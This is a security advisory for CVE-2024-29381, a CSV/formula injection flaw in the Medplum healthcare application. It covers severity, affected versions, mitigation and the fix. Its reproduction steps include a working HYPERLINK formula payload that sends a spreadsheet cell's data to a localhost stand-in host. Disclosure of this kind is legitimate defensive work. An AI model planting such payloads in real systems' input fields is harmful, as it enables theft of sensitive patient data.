CVE Number
CVE-2024-29381
Loginsoft ID
Loginsoft-2024-1012
Description
The application “Medplum” is affected by CSV/formula injection vulnerability, posing a risk of exposing sensitive data. An attacker could inject a malicious payload into input fields. Subsequently, when a high-privileged user exports the data as CSV, the injected payload may be executed.
CWE
CWE-1236: Improper Neutralization of Formula Elements in a CSV File
Affected Versions
< v3.0.8
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N 6.8(Medium)
Steps To Reproduce
- Create a new patient with gender field having the payload `=HYPERLINK("http://localhost:8181/?data="&F3,"Click Me") `.
- Now Export patient data in CSV format.
- Open the CSV file, press the Ctrl key, and left click on the cell with the value Click Me.
- Doing this exposes the sensitive data of the user located in cell F3.
Impact
Exposure of sensitive data.
Mitigation:
Convert each field into text when exporting as CSV. Additionally, add filters to the input fields.
Fix
https://github.com/medplum/medplum/pull/4079
Discovered Date
15 February 2024
Reported Date
19 February 2024
Patched Date
03 March 2024
Credit
Saharsh Agrawal